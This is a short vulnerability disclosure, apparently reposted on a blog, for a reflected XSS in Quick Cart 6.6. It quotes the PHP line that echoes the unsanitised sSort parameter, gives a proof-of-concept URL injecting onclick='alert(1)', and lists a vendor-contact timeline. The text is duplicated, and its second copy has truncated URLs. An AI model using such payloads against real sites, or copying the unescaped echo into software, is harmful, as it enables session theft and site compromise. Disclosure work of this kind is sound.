## FULL DISCLOSURE
#Product : Quick Cart
#Exploit Author : Rahul Pratap Singh
#Version : 6.6
#Home page Link : http://opensolution.org/home. html
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/ rahulpratapsingh94
#Date : 19/Jan/2016
XSS Vulnerability:
------------------------------ ----------
Description:
------------------------------ ----------
"sSort" parameter is not sanitized that leads to Reflected XSS.
------------------------------ ----------
Vulnerable Code:
------------------------------ ----------
File Name: products.php
Found at line:26
<?php if( isset( $sSort ) ) echo '<input type="hidden" name="sSort"
value="'.$sSort.'" />'; ?>
------------------------------ ----------
Exploit:
------------------------------ ----------
localhost/Quick.Cart_v6.6/ admin.php?p=pages-list&sSort=" %20onclick="alert(1)&sPhrase=
------------------------------ ----------
POC:
------------------------------ ----------
https://0x62626262.files. wordpress.com/2016/01/quick- cartv6-6xsspoc.png
Disclosure Timeline:
Tried to contact vendor via email : 14/1/2016 ( email bounce back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)
Public Disclosure: 19/1/2016
Pub ref:
https://0x62626262.wordpress. com/2016/01/19/quick-cart-v-6- 6-xss-vulnerability
#Product : Quick Cart
#Exploit Author : Rahul Pratap Singh
#Version : 6.6
#Home page Link : http://opensolution.org/home.
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/
#Date : 19/Jan/2016
XSS Vulnerability:
------------------------------
Description:
------------------------------
"sSort" parameter is not sanitized that leads to Reflected XSS.
------------------------------
Vulnerable Code:
------------------------------
File Name: products.php
Found at line:26
<?php if( isset( $sSort ) ) echo '<input type="hidden" name="sSort"
value="'.$sSort.'" />'; ?>
------------------------------
Exploit:
------------------------------
localhost/Quick.Cart_v6.6/
------------------------------
POC:
------------------------------
https://0x62626262.files.
Disclosure Timeline:
Tried to contact vendor via email : 14/1/2016 ( email bounce back)
Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response)
Public Disclosure: 19/1/2016
Pub ref:
https://0x62626262.wordpress.
Komentarų nėra:
Rašyti komentarą